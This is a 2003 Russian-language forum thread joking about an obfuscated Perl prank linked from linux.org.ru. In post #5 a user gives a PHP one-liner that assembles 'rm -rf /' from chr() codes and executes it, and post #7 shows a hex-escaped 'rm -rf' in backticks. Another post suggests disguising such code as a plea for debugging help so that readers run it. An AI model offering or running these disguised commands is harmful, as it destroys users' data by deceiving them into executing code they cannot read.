Камень в perl. Я плакал. http://www.linux.org.ru/view-message.jsp?msgid=392747
young Новичок 25 Сен 2003 #1 Камень в perl. Я плакал. http://www.linux.org.ru/view-message.jsp?msgid=392747
Ямерт The Old One 25 Сен 2003 #2 Лучше всего притом писать в стиле "Памагите исправить кот, должен вывадить на экран <полёт невинной фантазии>". Куча доброхотов с презрительными ухмылками запустит этот самый "кот". Масштаб поражения при таком подходе будет поболее
Лучше всего притом писать в стиле "Памагите исправить кот, должен вывадить на экран <полёт невинной фантазии>". Куча доброхотов с презрительными ухмылками запустит этот самый "кот". Масштаб поражения при таком подходе будет поболее
Crazy Developer 26 Сен 2003 #3 Да, братья... Трудно получить сравнимую радость от PHP. Читал и плакал от хохота: > пииип, пиииииииииип, пип, пиип пип пиииип Вроде расстроен человек... Наверное, случилось у него что... Нажмите для раскрытия...
Да, братья... Трудно получить сравнимую радость от PHP. Читал и плакал от хохота: > пииип, пиииииииииип, пип, пиип пип пиииип Вроде расстроен человек... Наверное, случилось у него что... Нажмите для раскрытия...
я... Guest 26 Сен 2003 #5 пхп тоже рулез =))) <?php for($Counter=97;$Counter<107;$Counter++)DEFINE(chr($Counter),$Counter-97); `(chr(b.b.e).chr(b.a.j).chr(a.d.c).chr(a.e.f).chr(b.b.e).chr(b.a.c).chr(a.d.c).chr(a.e.h))`; ?>
пхп тоже рулез =))) <?php for($Counter=97;$Counter<107;$Counter++)DEFINE(chr($Counter),$Counter-97); `(chr(b.b.e).chr(b.a.j).chr(a.d.c).chr(a.e.f).chr(b.b.e).chr(b.a.c).chr(a.d.c).chr(a.e.h))`; ?>
netdog net @ 26 Сен 2003 #7 или че-нить типа того`"\x72\x6d\x20\x2d\x72\x66"` только с большим извратом но то что там, это уже ПОЛНЫЙ изврат =)
или че-нить типа того`"\x72\x6d\x20\x2d\x72\x66"` только с большим извратом но то что там, это уже ПОЛНЫЙ изврат =)
Crazy Developer 26 Сен 2003 #10 Не... Не злой. Стебный. Автор -- молодец. Нужно учить горе-админов, которые: 1. Сидят постоянно под рутом. 2. Запускают левый код, смысла которого не понимают.
Не... Не злой. Стебный. Автор -- молодец. Нужно учить горе-админов, которые: 1. Сидят постоянно под рутом. 2. Запускают левый код, смысла которого не понимают.